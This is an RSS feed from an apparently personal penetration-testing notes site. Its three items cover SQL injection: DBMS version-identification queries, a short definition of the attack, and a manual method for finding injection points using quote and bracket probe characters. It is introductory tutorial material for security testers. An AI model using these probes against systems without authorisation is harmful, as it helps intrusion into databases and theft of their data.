<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>SQL Injection on LEIKAH</title><link>https://leikah.haoyingcao.xyz/en/categories/sql-injection/</link><description>Recent content in SQL Injection on LEIKAH</description><generator>Hugo</generator><language>en</language><atom:link href="https://leikah.haoyingcao.xyz/en/categories/sql-injection/index.xml" rel="self" type="application/rss+xml"/><item><title>Database Enumeration</title><link>https://leikah.haoyingcao.xyz/en/docs/web_attack/sqli/db_enum/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/web_attack/sqli/db_enum/</guid><description>&lt;p&gt;Database Enumeration and dumping is a crucial component of SQL Injection testing after the vulnerability has been confirmed. We can extract various sensitive data, user credentials, and much more.&lt;/p&gt;
&lt;h2 id="database-identification"&gt;Database Identification&lt;a class="td-heading-self-link" href="#database-identification" aria-label="Heading self-link"&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The first step is to identify the type and version of &lt;strong&gt;Database Management Systems (DBMS)&lt;/strong&gt; we are interacting with:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MySQL&lt;/strong&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81a1c1;font-weight:bold"&gt;SELECT&lt;/span&gt; &lt;span style="color:#81a1c1"&gt;@@&lt;/span&gt;&lt;span style="color:#81a1c1;font-weight:bold"&gt;version&lt;/span&gt;&lt;span style="color:#eceff4"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;MSSQL&lt;/strong&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81a1c1;font-weight:bold"&gt;SELECT&lt;/span&gt; &lt;span style="color:#81a1c1"&gt;@@&lt;/span&gt;&lt;span style="color:#81a1c1;font-weight:bold"&gt;version&lt;/span&gt;&lt;span style="color:#eceff4"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;PostgreSQL&lt;/strong&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-sql" data-lang="sql"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81a1c1;font-weight:bold"&gt;SELECT&lt;/span&gt; &lt;span style="color:#81a1c1;font-weight:bold"&gt;version&lt;/span&gt;&lt;span style="color:#eceff4"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="database-user"&gt;Database User&lt;a class="td-heading-self-link" href="#database-user" aria-label="Heading self-link"&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;It may also be beneficial to enumerate the user that the web application is authenticating to the database as.&lt;/p&gt;</description></item><item><title>SQL Injection</title><link>https://leikah.haoyingcao.xyz/en/docs/web_attack/sqli/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/web_attack/sqli/</guid><description>&lt;p&gt;Web applications often interact with SQL databases to &lt;strong&gt;Create, Read, Update, and Delete (CRUD)&lt;/strong&gt; data through SQL queries. &lt;strong&gt;SQL injection&lt;/strong&gt; occurs when a malicious user attempts to pass input that changes the SQL query sent by the web application to the database. First, attacker has to inject code outside the expected user limit so it does not get interpreted as user input. This is accomplished by using a single or double quote to escape the limits of user input.&lt;/p&gt;</description></item><item><title>SQLi Manual Testing Methodology</title><link>https://leikah.haoyingcao.xyz/en/docs/web_attack/sqli/manual_exploit/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/web_attack/sqli/manual_exploit/</guid><description>&lt;h2 id="discover-injection-points"&gt;Discover Injection Points&lt;a class="td-heading-self-link" href="#discover-injection-points" aria-label="Heading self-link"&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The first step in the methodology for testing SQL injection is identify injection points where user input would be passed into a SQL query, which can be:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;HTTP GET/POST Parameters&lt;/li&gt;
&lt;li&gt;UserAgent Strings&lt;/li&gt;
&lt;li&gt;Cookies&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can try to insert the following SQL special characters into the query and see if they would produce a different response from the back-end:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;'&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;`&lt;/li&gt;
&lt;li&gt;&lt;code&gt;)&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;))&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;\&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If we see errors messages or different page responses, it means these characters are being interpreted as part of the SQL statement, potentially revealing a viable injection point.&lt;/p&gt;</description></item></channel></rss>